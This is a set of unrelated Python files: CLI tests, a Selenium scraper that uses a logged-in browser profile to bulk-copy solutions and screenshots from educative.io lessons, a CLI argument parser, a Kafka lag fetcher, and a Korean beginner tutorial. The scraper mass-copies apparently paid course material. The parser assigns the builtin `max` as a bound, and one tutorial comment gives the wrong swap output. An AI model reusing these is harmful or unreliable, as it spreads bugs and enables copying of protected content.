result = runner.invoke(query, [])
self.assertIn(ERROR_MSGS['no_endpoint'], result.stdout)
def test_not_credentials(self):
runner = CliRunner()
result = runner.invoke(query, ["--debug",
"--from", "2018-01-01",
"--query", "from demo.ecommerce.data "
"select timestamp limit 1",
"--address", self.uri])
self.assertIsInstance(result.exception, DevoClientException)
self.assertEqual(result.exception.args[0]['status'], 500)
self.assertIn(ERROR_MSGS['no_auth'],
result.exception.args[0]['object'])
def test_bad_url(self):
runner = CliRunner()
result = runner.invoke(query, ["--debug",
"--from", "2018-01-01",
"--query", "from demo.ecommerce.data "
"select timestamp limit 1",
"--address", "error-apiv2-us.logtrust"
".com/search/query",
"--key", self.key,
"--secret", self.secret])
self.assertIsInstance(result.exception, DevoClientException)
self.assertEqual(result.exception.args[0]['status'], 500)
def test_bad_credentials(self):
runner = CliRunner()
result = runner.invoke(query, ["--debug",
"--from", "2018-01-01",
"--query", "from demo.ecommerce.data "
"select timestamp limit 1",
"--address", self.uri,
"--key", "aaa",
"--secret", self.secret])
self.assertIsInstance(result.exception, DevoClientException)
self.assertEqual(result.exception.args[0]['status'], 401)
def test_normal_query(self):
runner = CliRunner()
result = runner.invoke(query, ["--debug",
"--from", "2018-01-01",
"--query", "from demo.ecommerce.data "
"select timestamp limit 1",
"--address", self.uri,
"--key", self.key,
"--secret", self.secret])
self.assertIsNone(result.exception)
self.assertEqual(result.exit_code, 0)
self.assertIn('{"m":{"timestamp":{"type":"str","index":0}}}',
result.output)
def test_with_config_file(self):
if self.config_path:
runner = CliRunner()
result = runner.invoke(query, ["--debug",
"--from", "2018-01-01",
"--query",
"from demo.ecommerce.data "
"select timestamp limit 1",
"--config", self.config_path])
self.assertIsNone(result.exception)
self.assertEqual(result.exit_code, 0)
self.assertIn('{"m":{"timestamp":{"type":"str","index":0}}}',
result.output)
if __name__ == '__main__':
unittest.main()
|
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument("user-data-dir=C:\\Users\\anila\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 7\\")
options.add_argument(r'--profile-directory=Default')
options.add_argument("--start-maximized")
options.add_argument('--disable-gpu')
options.add_argument('--no-sandbox')
driver = webdriver.Chrome(executable_path="C:/chromedriver.exe", chrome_options=options)
driver.set_window_size(1920,1080)
# username = '<EMAIL>'
# password = '<PASSWORD>'
# driver.get("https://educative.io/login")
# driver.get_screenshot_as_file('testa.png')
# time.sleep(4)
# user_inp = driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input')
# user_inp.send_keys(username)
# pass_inp = driver.find_element_by_xpath('//*[@id="password-field"]')
# pass_inp.send_keys(password)
# driver.find_element_by_xpath('//*[@id="password-field"]').send_keys(Keys.RETURN)
# time.sleep(2)
# try:
# auth_inp = driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input')
# auth = input("Enter auth code: ")
# auth_inp.send_keys(auth)
# driver.find_element_by_xpath('//*[@id="__next"]/div[2]/div[2]/div/div/div/div/div[3]/form/div[1]/div[1]/input').send_keys(Keys.RETURN)
# except:
# pass
# driver.get_screenshot_as_file('testb.png')
# time.sleep(5)
# driver.get_screenshot_as_file('testc.png')
def code_copy(container,driver):
container = container.find_elements_by_css_selector("svg.w-7.h-7")
# time.sleep(1)
container[0].click()
print("Clicked on Clipboard")
textbox = driver.find_element_by_css_selector("textarea.tempcodebox")
textbox.click()
time.sleep(1)
textbox.send_keys(Keys.CONTROL, "a")
textbox.send_keys(Keys.CONTROL, "v")
time.sleep(1)
print("Paste complete")
return textbox.get_attribute('value')
image_count = int(input("Enter starting index: "))
url = input("Enter url: ")
driver.get(url)
while True:
bckpath = os.getcwd()
print("---------------",image_count,"-------------------")
flag = 0
try:
time.sleep(15)
pimage_name = driver.find_elements_by_css_selector('h2.mb-10')
if pimage_name != []:
if pimage_name[0] == "":
raise Exception
else:
image_name = pimage_name[0].get_attribute('innerHTML')
else:
image_name = driver.find_element_by_css_selector('h1.text-3xl.font-semibold.text-left.mb-2').get_attribute('innerHTML')
if image_name == "":
raise Exception
S = lambda X: driver.execute_script('return document.body.parentNode.scroll'+X)
driver.set_window_size(1920,S('Height'))
#show ans
answers = driver.find_elements_by_css_selector('button.whitespace-normal.outlined-default.m-0')
if answers != []:
for answer in answers:
answer.click()
answers = driver.find_elements_by_css_selector('div.tailwind-hidden')
if answers != []:
# print(len(answers))
for answer in answers:
if answer.get_attribute('innerHTML') == "Solution" or answer.get_attribute('innerHTML') == "Show Solution":
answer.click()
time.sleep(1)
driver.find_element_by_css_selector('button.text-default.py-2.m-2').click()
time.sleep(1)
if pimage_name == []:
js = '''var div = document.getElementsByClassName("text-3xl font-semibold text-left mb-2")[0];
var input = document.createElement("textarea");
input.name = "tempcodebox";
input.className = "tempcodebox";
input.maxLength = "10000";
input.cols = "50";
input.rows = "10";
div.appendChild(input);'''
driver.execute_script(js)
else:
js = '''var div = document.getElementsByClassName("mb-10")[0];
var input = document.createElement("textarea");
input.name = "tempcodebox";
input.className = "tempcodebox";
input.maxLength = "10000";
input.cols = "50";
input.rows = "10";
div.appendChild(input);'''
driver.execute_script(js)
answers = driver.find_elements_by_css_selector('div.styles__CodeEditorStyled-sc-2pjuhh-0.dgoHVT')
if answers != []:
bckpath = os.getcwd()
for answer in range(len(answers)):
clipboard = answers[answer].find_element_by_xpath('../..')
clipboard = clipboard.find_elements_by_css_selector('button.Button-sc-1i9ny0d-0.CircleButton-sc-1w51ure-0.Widget__CopyButton-csjrsw-3.styles__Buttons_Copy-sc-2pjuhh-3.kamgiT')
# print(clipboard)
if clipboard != []:
try:
# clipboard[0].click()
js = '''document.getElementsByClassName("Button-sc-1i9ny0d-0 CircleButton-sc-1w51ure-0 Widget__CopyButton-csjrsw-3 styles__Buttons_Copy-sc-2pjuhh-3 kamgiT")[0].click();'''
driver.execute_script(js)
print("Clicked on Solution Clipboard")
textbox = driver.find_element_by_css_selector("textarea.tempcodebox")
textbox.click()
time.sleep(1)
textbox.send_keys(Keys.CONTROL, "a")
textbox.send_keys(Keys.CONTROL, "v")
time.sleep(1)
print("Paste complete")
if str(image_count)+"-Codes" not in os.listdir():
os.mkdir(str(image_count)+"-Codes")
os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
f = open('Solution'+str(answer)+'.txt' , 'w',encoding='utf-8')
f.write(textbox.get_attribute('value'))
f.close()
except Exception as e:
print("Error copying text")
print(e)
pass
else:
js = '''document.getElementsByClassName("styles__CodeEditorStyled-sc-2pjuhh-0 dgoHVT")['''+str(answer)+'''].style.height = "3000px";'''
driver.execute_script(js)
os.chdir(bckpath)
js = '''document.getElementsByClassName("tempcodebox")[0].remove();'''
driver.execute_script(js)
# Slides
slides = driver.find_elements_by_css_selector('button.Button-sc-1i9ny0d-0.CircleButton-sc-1w51ure-0.styles__AnimationPlus-sc-8tvqhb-13.gjbvCG')
if slides != []:
for slide in slides:
slide.click()
print("Slides opened")
time.sleep(10)
else:
print("Slides skipped")
S = lambda X: driver.execute_script('return document.body.parentNode.scroll'+X)
driver.set_window_size(1920,S('Height'))
time.sleep(1)
for char in range(len(image_name)):
if image_name[char] == "#" or image_name[char] == ":" or image_name[char] == "?" or image_name[char] == "/" or image_name[char]=='"' or image_name[char] == "|" or image_name[char] == "*" or image_name[char] == "\\":
image_name = image_name[:char] + " " + image_name[char+1:]
driver.find_element_by_xpath("/html/body/div[1]/div[2]/div[2]").screenshot(str(image_count)+"-"+image_name+".png")
print("Image Created")
if pimage_name == []:
js = '''var div = document.getElementsByClassName("text-3xl font-semibold text-left mb-2")[0];
var input = document.createElement("textarea");
input.name = "tempcodebox";
input.className = "tempcodebox";
input.maxLength = "10000";
input.cols = "50";
input.rows = "10";
div.appendChild(input);'''
driver.execute_script(js)
else:
js = '''var div = document.getElementsByClassName("mb-10")[0];
var input = document.createElement("textarea");
input.name = "tempcodebox";
input.className = "tempcodebox";
input.maxLength = "10000";
input.cols = "50";
input.rows = "10";
div.appendChild(input);'''
driver.execute_script(js)
c1,c2 = 0,0
# Main Case
containers = driver.find_elements_by_css_selector('div.code-container')
if containers != []:
bckpath = os.getcwd()
if str(image_count)+"-Codes" not in os.listdir():
os.mkdir(str(image_count)+"-Codes")
os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
cdbckpath = os.getcwd()
for container in containers:
codebox_1 = container.find_element_by_xpath('../..')
codebox_1_ul = codebox_1.find_elements_by_css_selector('ul.styles__TabNav-sc-2pjuhh-15.bbbOxq.nav.nav-tabs')
codebox_2 = container.find_elements_by_css_selector('div.Widget__MultiFiles-csjrsw-6.styles__MultiFiles-sc-2pjuhh-8.bXHbra')
# Case 1 Ul tag with or without Filebox
if codebox_1_ul != []:
print("------Case 1-------")
os.chdir(cdbckpath)
if "Box"+str(c1) not in os.listdir():
os.makedirs("Box"+str(c1))
os.chdir(os.getcwd()+"\\Box"+str(c1))
c1+=1
tabs_ul = codebox_1_ul[0].find_elements_by_css_selector('span.desktop-only.styles__DesktopOnly-sc-2pjuhh-19.agoNC')
for tab_ul in tabs_ul:
tab_ul.click()
time.sleep(1)
print("Tab clicked of Ul tag")
tab_lang = tab_ul.find_element_by_css_selector('span.styles__TabTitle-sc-2pjuhh-14.hndpvI').get_attribute('innerHTML')
# case 2 Ul tag with file box
file_box = codebox_1.find_elements_by_css_selector('div.styles__Files-sc-2pjuhh-10.klYjb')
if file_box != []:
print("------Case 2--------")
files = file_box[0].find_elements_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.jFUhiu')
try:
codes = code_copy(codebox_1,driver)
lang = file_box[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
fname = tab_lang+lang+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error cannot create txt file")
for file in files:
print("Tab Clicked of File Box")
file.click()
time.sleep(1)
try:
codes = code_copy(codebox_1,driver)
lang = file_box[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
fname = tab_lang+lang+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error cannot create txt file")
else:
# Only Ul tag , and no file box is present
try:
codes = code_copy(codebox_1,driver)
lang = tab_ul.find_element_by_css_selector('span.styles__TabTitle-sc-2pjuhh-14.hndpvI').get_attribute('innerHTML')
fname = tab_lang+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error cannot create txt file")
elif codebox_1_ul == [] and codebox_2 != []:
# Case 3 > No Ul tag but only file box
print("-------Case 3-----------")
os.chdir(cdbckpath)
if "Box"+str(c1) not in os.listdir():
os.makedirs("Box"+str(c1))
os.chdir(os.getcwd()+"\\Box"+str(c1))
c1+=1
files = codebox_2[0].find_elements_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.jFUhiu')
try:
codes = code_copy(codebox_2[0],driver)
lang = codebox_2[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
fname = lang+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error cannot create txt file")
for file in files:
print("Tab Clicked of File Box")
file.click()
time.sleep(1)
try:
codes = code_copy(codebox_2[0],driver)
lang = codebox_2[0].find_element_by_css_selector('div.Widget__NavigaitonTab-csjrsw-2.styles__File-sc-2pjuhh-11.gIgnvf').get_attribute('innerHTML')
fname = lang+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error cannot create txt file")
elif codebox_1_ul == [] and codebox_2 == []:
# Case 4 No ul tag , No File box is present
print("--------Case 4-------")
os.chdir(cdbckpath)
try:
codes = code_copy(container,driver)
fname = "CodeBox"+str(c1)+".txt"
f = open(fname , "w", encoding='utf-8')
f.write(codes)
f.close()
print("Txt File Created")
except:
print("Error , cannot create txt file")
pass
c1+=1
os.chdir(bckpath)
# Case 5
containers = driver.find_elements_by_css_selector('div.styles__Spa_Container-sc-1vx22vv-62.jquSGK')
if containers != []:
print("-------Case 5--------")
bckpath = os.getcwd()
if str(image_count)+"-Codes" not in os.listdir():
os.mkdir(str(image_count)+"-Codes")
os.chdir(os.getcwd()+"\\"+str(image_count)+"-Codes")
cdbckpath = os.getcwd()
for container in containers:
os.chdir(cdbckpath)
if "BoxT2-"+str(c2) not in os.listdir():
os.makedirs("BoxT2-"+str(c2))
os.chdir(os.getcwd()+"\\BoxT2-"+str(c2))
c2+=1
driver.command_executor._commands["send_command"] = ("POST", '/session/$sessionId/chromium/send_command')
params = {'cmd': 'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': os.getcwd()}}
driver.execute("send_command", params)
try:
container.find_elements_by_css_selector("svg.w-7.h-7")[1].click()
time.sleep(2)
print("Downloaded Zip File")
except:
print("Zip File not Downloaded")
pass
# files = container.find_element_by_css_selector('div.children')
# tabs = files.find_elements_by_css_selector('span.styles__NavIcon-sc-1vx22vv-21.cueaXz')
# for tab in tabs:
# if tab.get_attribute('innerHTML') == "":
# tab = tab.find_element_by_xpath('../..')
# tab = tab.find_element_by_css_selector('span.node')
# print("Tab Clicked")
# tab.click()
# time.sleep(1)
# lang = tab.get_attribute('innerHTML')[58:]
# codes = code_copy(container,driver)
# fname = lang+".txt"
# f = open(fname , "w",encoding='utf-8')
# f.write(codes)
# f.close()
os.chdir(bckpath)
driver.set_window_size(1920,1080)
except Exception as e:
flag = 1
driver.refresh()
os.chdir(bckpath)
print(e)
pass
print(flag)
if flag == 0:
try:
if driver.find_elements_by_css_selector('button.outlined-primary.m-0')[0].get_attribute('innerHTML')[:11] == "Next Module":
# file = open(str(image_count)+"-NewModule.txt" ,"w")
# file.write("New Module at pos "+str(image_count))
# file.close()
driver.quit()
break
# time.sleep(1)
# driver.find_elements_by_css_selector('button.outlined-primary.m-0')[0].click()
js = '''document.getElementsByClassName('outlined-primary m-0')[0].click();'''
driver.execute_script(js)
print("Next Page")
image_count+=1
except Exception as e:
print(e)
driver.quit()
break
else:
pass
print("Finished") |
<gh_stars>10-100
#!/usr/bin/python -tt
#
# Copyright 2009-2010 Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from exceptions import *
import command
import tokenize
class ParsedArgs(object):
pass
class ArgCommand(command.Command):
def __init__(self, args, help):
self.argTypes = args
self.helpText = help
def run(self, cli_obj, name, args, line):
args = args[1:]
num_args = len(args)
num_arg_types = len(self.argTypes)
if num_args > num_arg_types:
trailing_args = args[num_arg_types:]
msg = 'trailing arguments: ' + tokenize.escape_args(trailing_args)
raise CommandArgumentsError(msg)
parsed_args = ParsedArgs()
for n in range(num_args):
arg_type = self.argTypes[n]
value = arg_type.parse(cli_obj, args[n])
setattr(parsed_args, arg_type.getName(), value)
if num_args < num_arg_types:
# Make sure the remaining options are optional
# (The next argument must be marked as optional.
# The optional flag on arguments after this doesn't matter.)
arg_type = self.argTypes[num_args]
if not arg_type.isOptional():
msg = 'missing %s' % (arg_type.getHrName(),)
raise CommandArgumentsError(msg)
for n in range(num_args, num_arg_types):
arg_type = self.argTypes[n]
setattr(parsed_args, arg_type.getName(), arg_type.getDefaultValue())
return self.runParsed(cli_obj, name, parsed_args)
def help(self, cli_obj, name, args, line):
args = args[1:]
syntax = name
end = ''
for arg in self.argTypes:
if arg.isOptional():
syntax += ' [<%s>' % (arg.getName(),)
end += ']'
else:
syntax += ' <%s>' % (arg.getName(),)
syntax += end
cli_obj.output(syntax)
if not self.helpText:
return
# FIXME: do nicer formatting of the help message
cli_obj.output()
cli_obj.output(self.helpText)
def complete(self, cli_obj, name, args, text):
args = args[1:]
index = len(args)
try:
arg_type = self.argTypes[index]
except IndexError:
return []
return arg_type.complete(cli_obj, text)
class Argument(object):
def __init__(self, name, **kwargs):
self.name = name
self.hrName = name
self.default = None
self.optional = False
for (kwname, kwvalue) in kwargs.items():
if kwname == 'default':
self.default = kwvalue
elif kwname == 'hr_name':
self.hrName = kwvalue
elif kwname == 'optional':
self.optional = kwvalue
else:
raise TypeError('unknown keyword argument %r' % (kwname,))
def getName(self):
return self.name
def getHrName(self):
"""
arg.getHrName() --> string
Get the human-readable name.
"""
return self.hrName
def isOptional(self):
return self.optional
def getDefaultValue(self):
return self.default
def complete(self, cli_obj, text):
return []
class StringArgument(Argument):
def parse(self, cli_obj, arg):
return arg
class IntArgument(Argument):
def __init__(self, name, **kwargs):
self.min = None
self.max = None
arg_kwargs = {}
for (kwname, kwvalue) in kwargs.items():
if kwname == 'min':
self.min = kwvalue
elif kwname == 'max':
self.max = max
else:
arg_kwargs[kwname] = kwvalue
Argument.__init__(self, name, **arg_kwargs)
def parse(self, cli_obj, arg):
try:
value = int(arg)
except ValueError:
msg = '%s must be an integer' % (self.getHrName(),)
raise CommandArgumentsError(msg)
if self.min != None and value < self.min:
msg = '%s must be greater than %s' % (self.getHrName(), self.min)
raise CommandArgumentsError(msg)
if self.max != None and value > self.max:
msg = '%s must be less than %s' % (self.getHrName(), self.max)
raise CommandArgumentsError(msg)
return value
|
<reponame>buildfail/frontera
from __future__ import absolute_import
import copy
import logging
import time
import collections
import six
from kafka.client_async import KafkaClient
from kafka import errors as Errors, TopicPartition
from kafka.future import Future
from kafka.protocol.commit import GroupCoordinatorRequest, OffsetFetchRequest
from kafka.protocol.offset import OffsetRequest
from kafka.structs import OffsetAndMetadata
log = logging.getLogger('offsets-fetcher')
class OffsetsFetcherAsync(object):
DEFAULT_CONFIG = {
'session_timeout_ms': 30000,
'heartbeat_interval_ms': 3000,
'retry_backoff_ms': 100,
'api_version': (0, 9),
'metric_group_prefix': ''
}
def __init__(self, **configs):
self.config = copy.copy(self.DEFAULT_CONFIG)
self.config.update(configs)
self._client = KafkaClient(**self.config)
self._coordinator_id = None
self.group_id = configs['group_id']
self.topic = configs['topic']
def _ensure_coordinator_known(self):
"""Block until the coordinator for this group is known
(and we have an active connection -- java client uses unsent queue).
"""
while self._coordinator_unknown():
# Prior to 0.8.2 there was no group coordinator
# so we will just pick a node at random and treat
# it as the "coordinator"
if self.config['api_version'] < (0, 8, 2):
self._coordinator_id = self._client.least_loaded_node()
self._client.ready(self._coordinator_id)
continue
future = self._send_group_coordinator_request()
self._client.poll(future=future)
if future.failed():
if isinstance(future.exception,
Errors.GroupCoordinatorNotAvailableError):
continue
elif future.retriable():
metadata_update = self._client.cluster.request_update()
self._client.poll(future=metadata_update)
else:
raise future.exception # pylint: disable-msg=raising-bad-type
def _coordinator_unknown(self):
"""Check if we know who the coordinator is and have an active connection
Side-effect: reset _coordinator_id to None if connection failed
Returns:
bool: True if the coordinator is unknown
"""
if self._coordinator_id is None:
return True
if self._client.is_disconnected(self._coordinator_id):
self._coordinator_dead()
return True
return False
def _coordinator_dead(self, error=None):
"""Mark the current coordinator as dead."""
if self._coordinator_id is not None:
log.warning("Marking the coordinator dead (node %s) for group %s: %s.",
self._coordinator_id, self.group_id, error)
self._coordinator_id = None
def _send_group_coordinator_request(self):
"""Discover the current coordinator for the group.
Returns:
Future: resolves to the node id of the coordinator
"""
node_id = self._client.least_loaded_node()
if node_id is None:
return Future().failure(Errors.NoBrokersAvailable())
log.debug("Sending group coordinator request for group %s to broker %s",
self.group_id, node_id)
request = GroupCoordinatorRequest[0](self.group_id)
future = Future()
_f = self._client.send(node_id, request)
_f.add_callback(self._handle_group_coordinator_response, future)
_f.add_errback(self._failed_request, node_id, request, future)
return future
def _handle_group_coordinator_response(self, future, response):
log.debug("Received group coordinator response %s", response)
if not self._coordinator_unknown():
# We already found the coordinator, so ignore the request
log.debug("Coordinator already known -- ignoring metadata response")
future.success(self._coordinator_id)
return
error_type = Errors.for_code(response.error_code)
if error_type is Errors.NoError:
ok = self._client.cluster.add_group_coordinator(self.group_id, response)
if not ok:
# This could happen if coordinator metadata is different
# than broker metadata
future.failure(Errors.IllegalStateError())
return
self._coordinator_id = response.coordinator_id
log.info("Discovered coordinator %s for group %s",
self._coordinator_id, self.group_id)
self._client.ready(self._coordinator_id)
future.success(self._coordinator_id)
elif error_type is Errors.GroupCoordinatorNotAvailableError:
log.debug("Group Coordinator Not Available; retry")
future.failure(error_type())
elif error_type is Errors.GroupAuthorizationFailedError:
error = error_type(self.group_id)
log.error("Group Coordinator Request failed: %s", error)
future.failure(error)
else:
error = error_type()
log.error("Unrecognized failure in Group Coordinator Request: %s",
error)
future.failure(error)
def _failed_request(self, node_id, request, future, error):
log.error('Error sending %s to node %s [%s]',
request.__class__.__name__, node_id, error)
# Marking coordinator dead
# unless the error is caused by internal client pipelining
if not isinstance(error, (Errors.NodeNotReadyError,
Errors.TooManyInFlightRequests)):
self._coordinator_dead()
future.failure(error)
def offsets(self, partitions, timestamp):
"""Fetch a single offset before the given timestamp for the set of partitions.
Blocks until offset is obtained, or a non-retriable exception is raised
Arguments:
partitions (iterable of TopicPartition) The partition that needs fetching offset.
timestamp (int): timestamp for fetching offset. -1 for the latest
available, -2 for the earliest available. Otherwise timestamp
is treated as epoch seconds.
Returns:
dict: TopicPartition and message offsets
"""
retries = 3
while retries > 0:
offsets = {}
for future in self._send_offset_request(partitions, timestamp):
self._client.poll(future=future)
if future.succeeded():
for tp, offset in future.value:
offsets[tp] = offset
continue
if not future.retriable():
raise future.exception # pylint: disable-msg=raising-bad-type
if future.exception.invalid_metadata:
refresh_future = self._client.cluster.request_update()
self._client.poll(future=refresh_future)
log.warning("Got exception %s and kept the loop", future.exception)
if offsets:
return offsets
retries -= 1
log.warning("Retrying the offsets fetch loop (%d retries left)", retries)
log.error("Unsuccessful offsets retrieval")
return {}
def _send_offset_request(self, partitions, timestamp):
"""Fetch a single offset before the given timestamp for the partition.
Arguments:
partitions iterable of TopicPartition: partitions that needs fetching offset
timestamp (int): timestamp for fetching offset
Returns:
list of Future: resolves to the corresponding offset
"""
topic = partitions[0].topic
nodes_per_partitions = {}
for partition in partitions:
node_id = self._client.cluster.leader_for_partition(partition)
if node_id is None:
log.debug("Partition %s is unknown for fetching offset,"
" wait for metadata refresh", partition)
return [Future().failure(Errors.StaleMetadata(partition))]
elif node_id == -1:
log.debug("Leader for partition %s unavailable for fetching offset,"
" wait for metadata refresh", partition)
return [Future().failure(Errors.LeaderNotAvailableError(partition))]
nodes_per_partitions.setdefault(node_id, []).append(partition)
# Client returns a future that only fails on network issues
# so create a separate future and attach a callback to update it
# based on response error codes
futures = []
for node_id, partitions in six.iteritems(nodes_per_partitions):
request = OffsetRequest[0](
-1, [(topic, [(partition.partition, timestamp, 1) for partition in partitions])]
)
future_request = Future()
_f = self._client.send(node_id, request)
_f.add_callback(self._handle_offset_response, partitions, future_request)
def errback(e):
log.error("Offset request errback error %s", e)
future_request.failure(e)
_f.add_errback(errback)
futures.append(future_request)
return futures
def _handle_offset_response(self, partitions, future, response):
"""Callback for the response of the list offset call above.
Arguments:
partition (TopicPartition): The partition that was fetched
future (Future): the future to update based on response
response (OffsetResponse): response from the server
Raises:
AssertionError: if response does not match partition
"""
topic, partition_info = response.topics[0]
assert len(response.topics) == 1, (
'OffsetResponse should only be for a single topic')
partition_ids = set([part.partition for part in partitions])
result = []
for pi in partition_info:
part, error_code, offsets = pi
assert topic == partitions[0].topic and part in partition_ids, (
'OffsetResponse partition does not match OffsetRequest partition')
error_type = Errors.for_code(error_code)
if error_type is Errors.NoError:
assert len(offsets) == 1, 'Expected OffsetResponse with one offset'
log.debug("Fetched offset %s for partition %d", offsets[0], part)
result.append((TopicPartition(topic, part), offsets[0]))
elif error_type in (Errors.NotLeaderForPartitionError,
Errors.UnknownTopicOrPartitionError):
log.debug("Attempt to fetch offsets for partition %s failed due"
" to obsolete leadership information, retrying.",
str(partitions))
future.failure(error_type(partitions))
else:
log.warning("Attempt to fetch offsets for partition %s failed due to:"
" %s", partitions, error_type)
future.failure(error_type(partitions))
future.success(result)
def fetch_committed_offsets(self, partitions):
"""Fetch the current committed offsets for specified partitions
Arguments:
partitions (list of TopicPartition): partitions to fetch
Returns:
dict: {TopicPartition: OffsetAndMetadata}
"""
if not partitions:
return {}
while True:
self._ensure_coordinator_known()
# contact coordinator to fetch committed offsets
future = self._send_offset_fetch_request(partitions)
self._client.poll(future=future)
if future.succeeded():
return future.value
if not future.retriable():
raise future.exception # pylint: disable-msg=raising-bad-type
time.sleep(self.config['retry_backoff_ms'] / 1000.0)
def _send_offset_fetch_request(self, partitions):
"""Fetch the committed offsets for a set of partitions.
This is a non-blocking call. The returned future can be polled to get
the actual offsets returned from the broker.
Arguments:
partitions (list of TopicPartition): the partitions to fetch
Returns:
Future: resolves to dict of offsets: {TopicPartition: int}
"""
assert self.config['api_version'] >= (0, 8, 1), 'Unsupported Broker API'
assert all(map(lambda k: isinstance(k, TopicPartition), partitions))
if not partitions:
return Future().success({})
elif self._coordinator_unknown():
return Future().failure(Errors.GroupCoordinatorNotAvailableError)
node_id = self._coordinator_id
# Verify node is ready
if not self._client.ready(node_id):
log.debug("Node %s not ready -- failing offset fetch request",
node_id)
return Future().failure(Errors.NodeNotReadyError)
log.debug("Group %s fetching committed offsets for partitions: %s",
self.group_id, partitions)
# construct the request
topic_partitions = collections.defaultdict(set)
for tp in partitions:
topic_partitions[tp.topic].add(tp.partition)
if self.config['api_version'] >= (0, 8, 2):
request = OffsetFetchRequest[1](
self.group_id,
list(topic_partitions.items())
)
else:
request = OffsetFetchRequest[0](
self.group_id,
list(topic_partitions.items())
)
# send the request with a callback
future = Future()
_f = self._client.send(node_id, request)
_f.add_callback(self._handle_offset_fetch_response, future)
_f.add_errback(self._failed_request, node_id, request, future)
return future
def _handle_offset_fetch_response(self, future, response):
offsets = {}
for topic, partitions in response.topics:
for partition, offset, metadata, error_code in partitions:
tp = TopicPartition(topic, partition)
error_type = Errors.for_code(error_code)
if error_type is not Errors.NoError:
error = error_type()
log.debug("Group %s failed to fetch offset for partition"
" %s: %s", self.group_id, tp, error)
if error_type is Errors.GroupLoadInProgressError:
# just retry
future.failure(error)
elif error_type is Errors.NotCoordinatorForGroupError:
# re-discover the coordinator and retry
self._coordinator_dead()
future.failure(error)
elif error_type in (Errors.UnknownMemberIdError,
Errors.IllegalGenerationError):
future.failure(error)
elif error_type is Errors.UnknownTopicOrPartitionError:
log.warning("OffsetFetchRequest -- unknown topic %s"
" (have you committed any offsets yet?)",
topic)
continue
else:
log.error("Unknown error fetching offsets for %s: %s",
tp, error)
future.failure(error)
return
elif offset >= 0:
# record the position with the offset
# (-1 indicates no committed offset to fetch)
offsets[tp] = OffsetAndMetadata(offset, metadata)
else:
log.debug("Group %s has no committed offset for partition"
" %s", self.group_id, tp)
future.success(offsets)
def get(self):
topic_partitions = self._client.cluster.partitions_for_topic(self.topic)
if not topic_partitions:
future = self._client.cluster.request_update()
log.info("No partitions available, performing metadata update.")
self._client.poll(future=future)
return {}
partitions = [TopicPartition(self.topic, partition_id) for partition_id in topic_partitions]
offsets = self.offsets(partitions, -1)
committed = self.fetch_committed_offsets(partitions)
lags = {}
for tp, offset in six.iteritems(offsets):
commit_offset = committed[tp] if tp in committed else 0
numerical = commit_offset if isinstance(commit_offset, int) else commit_offset.offset
lag = offset - numerical
pid = tp.partition if isinstance(tp, TopicPartition) else tp
log.debug("Lag for %s (%s): %s, %s, %s", self.topic, pid, offset, commit_offset, lag)
lags[pid] = lag
return lags |
<filename>01_DataType.py
# +, * 연산자
print('py''thon') # python - 중간에 + 생략되어 있다.
print('py' * 3) # pypypy
# 문자 인덱싱 & 슬라이싱
tempStr = 'python'
print(tempStr[0]) # p
print(tempStr[5]) # n
print(tempStr[1:4]) # yth
print(tempStr[-2:]) # on
# 유니코드
print('가')
print(type('가'))
print('가'.encode('utf-8'))
print(type('가'.encode('utf-8')))
# 리스트
colors = ['red', 'green', 'gold']
print(colors) # ['red', 'green', 'gold']
colors.append("blue")
print(colors) # ['red', 'green', 'gold', 'blue']
colors.insert(1, 'black')
print(colors) # ['red', 'black', 'green', 'gold', 'blue']
colors.extend(['white', 'gray'])
print(colors) # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray']
print(colors.index("black")) # 1
# 검색범위 안에 값이 없으면 error
# print(colors.index("black", 3, 4)) # ValueError: 'black' is not in list
colors.append('red')
print(colors.count('red')) # 2
print(colors) # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray', 'red']
print(colors.pop()) # red
print(colors) # ['red', 'black', 'green', 'gold', 'blue', 'white', 'gray']
# 세트
a = {1, 2, 3}
b = {3, 4, 5}
print(a.union(b)) # 합집합 - {1, 2, 3, 4, 5}
print(a.intersection(b)) # 교집합 - {3}
# 튜플
c, d = 1, 2
print(c, d) # 1 2
c, d = d, c
print(c, d) # 2 2
# 딕셔너리
# color = dict(apple='red', banana='yello')
color = {'apple': 'red', 'banana': 'yello'}
print(color["apple"]) # red
color["apple"] = 'green'
print(color["apple"]) # green
print(color.keys()) # dict_keys(['apple', 'banana'])
print(color.values()) # dict_values(['green', 'yello'])
for k, v in color.items():
